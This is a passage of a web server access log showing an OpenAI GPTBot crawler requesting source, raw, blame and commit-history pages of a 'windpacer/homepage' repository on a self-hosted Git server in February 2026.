GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" +[17/Feb/2026:13:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 24063] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js" +[17/Feb/2026:13:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 17296] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:13:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" [Client 74.7.227.38] [Length 10325] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" +[17/Feb/2026:13:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" +[17/Feb/2026:13:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" +[17/Feb/2026:13:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" +[17/Feb/2026:13:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10863] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" +[17/Feb/2026:13:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" +[17/Feb/2026:13:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 24056] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js" +[17/Feb/2026:13:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js" [Client 74.7.227.38] [Length 10100] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js" +[17/Feb/2026:13:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" [Client 74.7.227.38] [Length 14676] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 28906] [Gzip 10.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" +[17/Feb/2026:13:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" [Client 74.7.227.38] [Length 11913] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" +[17/Feb/2026:13:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" [Client 74.7.227.38] [Length 11190] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" +[17/Feb/2026:13:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" [Client 74.7.227.38] [Length 10353] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" +[17/Feb/2026:13:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" [Client 74.7.227.38] [Length 17999] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" +[17/Feb/2026:13:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" +[17/Feb/2026:13:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite" [Client 74.7.227.38] [Length 159744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite" +[17/Feb/2026:13:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" [Client 74.7.227.38] [Length 11033] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" +[17/Feb/2026:13:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" [Client 74.7.227.38] [Length 11030] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" +[17/Feb/2026:13:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" +[17/Feb/2026:13:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services" [Client 74.7.227.38] [Length 9911] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" +[17/Feb/2026:13:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" [Client 74.7.227.38] [Length 10577] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" +[17/Feb/2026:13:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages" [Client 74.7.227.38] [Length 9976] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" +[17/Feb/2026:13:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" [Client 74.7.227.38] [Length 11458] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" +[17/Feb/2026:13:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" [Client 74.7.227.38] [Length 11485] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" +[17/Feb/2026:13:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" [Client 74.7.227.38] [Length 11892] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" +[17/Feb/2026:13:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" [Client 74.7.227.38] [Length 11610] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" +[17/Feb/2026:13:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" [Client 74.7.227.38] [Length 11024] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" +[17/Feb/2026:13:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" +[17/Feb/2026:13:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" [Client 74.7.227.38] [Length 11265] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" +[17/Feb/2026:13:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" [Client 74.7.227.38] [Length 11852] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" +[17/Feb/2026:13:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services" +[17/Feb/2026:13:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" +[17/Feb/2026:13:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages" +[17/Feb/2026:13:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" +[17/Feb/2026:13:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" [Client 74.7.227.38] [Length 10781] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" +[17/Feb/2026:13:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" [Client 74.7.227.38] [Length 10731] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" +[17/Feb/2026:13:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" +[17/Feb/2026:13:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" [Client 74.7.227.38] [Length 10828] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" +[17/Feb/2026:13:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" +[17/Feb/2026:13:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" [Client 74.7.227.38] [Length 10353] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" +[17/Feb/2026:13:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" [Client 74.7.227.38] [Length 11186] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" +[17/Feb/2026:13:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" [Client 74.7.227.38] [Length 11208] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" +[17/Feb/2026:13:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" +[17/Feb/2026:13:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" +[17/Feb/2026:13:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" +[17/Feb/2026:13:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" +[17/Feb/2026:13:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" +[17/Feb/2026:13:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" +[17/Feb/2026:13:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" +[17/Feb/2026:13:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" +[17/Feb/2026:13:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" [Client 74.7.227.38] [Length 11669] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" +[17/Feb/2026:13:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" [Client 74.7.227.38] [Length 31009] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" +[17/Feb/2026:13:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" +[17/Feb/2026:13:07:09 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 